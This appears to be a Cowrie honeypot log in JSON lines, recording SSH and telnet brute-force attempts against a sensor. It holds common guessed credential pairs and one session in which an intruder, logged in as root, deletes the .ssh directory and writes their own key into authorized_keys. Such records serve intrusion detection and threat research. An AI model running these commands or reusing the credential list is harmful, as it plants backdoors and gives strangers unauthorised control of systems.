{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:49:35.126534Z","src_ip":"118.26.39.178","session":"4d16d4038dba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35280,"dst_ip":"1.2.3.4","dst_port":22,"session":"28fc37e130a7","protocol":"ssh","message":"New connection: 212.227.235.229:35280 (1.2.3.4:22) [session: 28fc37e130a7]","sensor":"my-vps","timestamp":"2025-09-09T06:49:46.502812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:49:46.503832Z","src_ip":"212.227.235.229","session":"28fc37e130a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:49:46.746300Z","src_ip":"212.227.235.229","session":"28fc37e130a7"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"webadmin@123","message":"login attempt [webadmin/webadmin@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:49:47.754868Z","src_ip":"212.227.235.229","session":"28fc37e130a7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:49:48.998773Z","src_ip":"212.227.235.229","session":"28fc37e130a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63568,"dst_ip":"1.2.3.4","dst_port":22,"session":"470d68521d5b","protocol":"ssh","message":"New connection: 212.227.235.229:63568 (1.2.3.4:22) [session: 470d68521d5b]","sensor":"my-vps","timestamp":"2025-09-09T06:49:51.369656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:49:51.370339Z","src_ip":"212.227.235.229","session":"470d68521d5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:49:51.488790Z","src_ip":"212.227.235.229","session":"470d68521d5b"}
{"eventid":"cowrie.login.failed","username":"devops","password":"devops","message":"login attempt [devops/devops] failed","sensor":"my-vps","timestamp":"2025-09-09T06:49:52.013606Z","src_ip":"212.227.235.229","session":"470d68521d5b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:49:53.133357Z","src_ip":"212.227.235.229","session":"470d68521d5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48969,"dst_ip":"1.2.3.4","dst_port":22,"session":"bea13ad7a272","protocol":"ssh","message":"New connection: 212.227.235.229:48969 (1.2.3.4:22) [session: bea13ad7a272]","sensor":"my-vps","timestamp":"2025-09-09T06:50:31.804798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:50:31.805858Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:50:31.903265Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz0p;/","message":"login attempt [root/1qaz0p;/] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:50:32.337011Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:50:32.587828Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:50:32.588681Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:50:32.589538Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:50:32.688422Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:50:32.905450Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:50:32.906228Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:50:33.006058Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:50:33.007114Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49117,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd161cc76e55","protocol":"ssh","message":"New connection: 212.227.235.229:49117 (1.2.3.4:22) [session: cd161cc76e55]","sensor":"my-vps","timestamp":"2025-09-09T06:50:33.077181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:50:33.077846Z","src_ip":"212.227.235.229","session":"cd161cc76e55"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:50:33.162180Z","src_ip":"212.227.235.229","session":"cd161cc76e55"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:50:33.540616Z","src_ip":"212.227.235.229","session":"cd161cc76e55"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:50:34.626679Z","src_ip":"212.227.235.229","session":"cd161cc76e55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49309,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d6b3c25b11a","protocol":"ssh","message":"New connection: 212.227.235.229:49309 (1.2.3.4:22) [session: 2d6b3c25b11a]","sensor":"my-vps","timestamp":"2025-09-09T06:50:34.710776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:50:34.711701Z","src_ip":"212.227.235.229","session":"2d6b3c25b11a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:50:34.796087Z","src_ip":"212.227.235.229","session":"2d6b3c25b11a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:50:35.178418Z","src_ip":"212.227.235.229","session":"2d6b3c25b11a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:50:35.264995Z","src_ip":"212.227.235.229","session":"2d6b3c25b11a"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:50:35.277361Z","src_ip":"212.227.235.229","session":"bea13ad7a272"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":55594,"dst_ip":"1.2.3.4","dst_port":22,"session":"b45779cd6593","protocol":"ssh","message":"New connection: 157.20.207.165:55594 (1.2.3.4:22) [session: b45779cd6593]","sensor":"my-vps","timestamp":"2025-09-09T06:50:36.941893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:50:36.942963Z","src_ip":"157.20.207.165","session":"b45779cd6593"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:50:37.125551Z","src_ip":"157.20.207.165","session":"b45779cd6593"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin1234","message":"login attempt [ftpuser/admin1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:50:37.899409Z","src_ip":"157.20.207.165","session":"b45779cd6593"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:50:39.086087Z","src_ip":"157.20.207.165","session":"b45779cd6593"}
{"eventid":"cowrie.session.connect","src_ip":"150.241.115.7","src_port":38002,"dst_ip":"1.2.3.4","dst_port":23,"session":"b41963740261","protocol":"telnet","message":"New connection: 150.241.115.7:38002 (1.2.3.4:23) [session: b41963740261]","sensor":"my-vps","timestamp":"2025-09-09T06:50:40.033785Z"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":38524,"dst_ip":"1.2.3.4","dst_port":22,"session":"621a15b9638e","protocol":"ssh","message":"New connection: 139.19.117.131:38524 (1.2.3.4:22) [session: 621a15b9638e]","sensor":"my-vps","timestamp":"2025-09-09T06:50:51.246172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:50:51.247155Z","src_ip":"139.19.117.131","session":"621a15b9638e"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T06:50:51.263814Z","src_ip":"139.19.117.131","session":"621a15b9638e"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","sensor":"my-vps","timestamp":"2025-09-09T06:50:51.299449Z","src_ip":"139.19.117.131","session":"621a15b9638e"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T06:50:51.300152Z","src_ip":"139.19.117.131","session":"621a15b9638e"}
